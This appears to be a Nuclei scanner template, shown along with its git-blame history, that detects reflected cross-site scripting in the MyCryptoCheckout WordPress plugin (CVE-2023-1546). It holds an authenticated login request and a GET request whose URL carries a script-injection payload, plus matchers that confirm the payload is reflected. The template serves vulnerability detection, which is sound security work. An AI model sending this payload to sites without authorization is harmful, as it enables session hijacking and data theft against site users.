nuclei-templates/http/cves/2023/CVE-2023-1546.yaml

id: CVE-2023-1546

info:
  name: MyCryptoCheckout < 2.124 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 2.124
  reference:
    - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1546
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1546
    cwe-id: CWE-79
    epss-score: 0.00087
    epss-percentile: 0.36792
    cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plainviewplugins
    product: mycryptocheckout
    framework: wordpress
  tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "scriptalert(/XSS/)/script")'
          - 'contains(body_2, "mycryptocheckout")'
        condition: and
# digest: 4a0a00473045022100a5543a3c7f138537869158794cc19d7e7cf4177118b7829488b5a952c0c3b2bc02204e68af118f9d1ace75a15952a8bdb5cfb5aaeb7443589b3cbaf1e2528b5f8821:922c64590222798bb761d5b6d8e72950
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`id: CVE-2023-1546`

			`info:`
updated payload,matcher,info 2023-07-16 17:28:45 +00:00			`name: MyCryptoCheckout < 2.124 - Cross-Site Scripting`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`author: Harsh`
			`severity: medium`
			`description: \|`
lower case tags and remediation 2023-07-18 05:49:43 +00:00			`The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: Fixed in version 2.124`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0`
updated payload,matcher,info 2023-07-16 17:28:45 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-1546`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`classification:`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`cve-id: CVE-2023-1546`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-79`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.00087`
			`epss-percentile: 0.36792`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout::::::wordpress::*`
updated payload,matcher,info 2023-07-16 17:28:45 +00:00			`metadata:`
			`verified: true`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`max-request: 2`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: plainviewplugins`
			`product: mycryptocheckout`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`framework: wordpress`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
updated payload,matcher,info 2023-07-16 17:28:45 +00:00			`GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> HTTP/1.1`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code_2 == 200'`
			`- 'contains(header_2, "text/html")'`
updated payload,matcher,info 2023-07-16 17:28:45 +00:00			`- 'contains(body_2, "scriptalert(/XSS/)/script")'`
			`- 'contains(body_2, "mycryptocheckout")'`
Create CVE-2023-1546.yaml 2023-07-15 18:06:25 +00:00			`condition: and`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022100a5543a3c7f138537869158794cc19d7e7cf4177118b7829488b5a952c0c3b2bc02204e68af118f9d1ace75a15952a8bdb5cfb5aaeb7443589b3cbaf1e2528b5f8821:922c64590222798bb761d5b6d8e72950`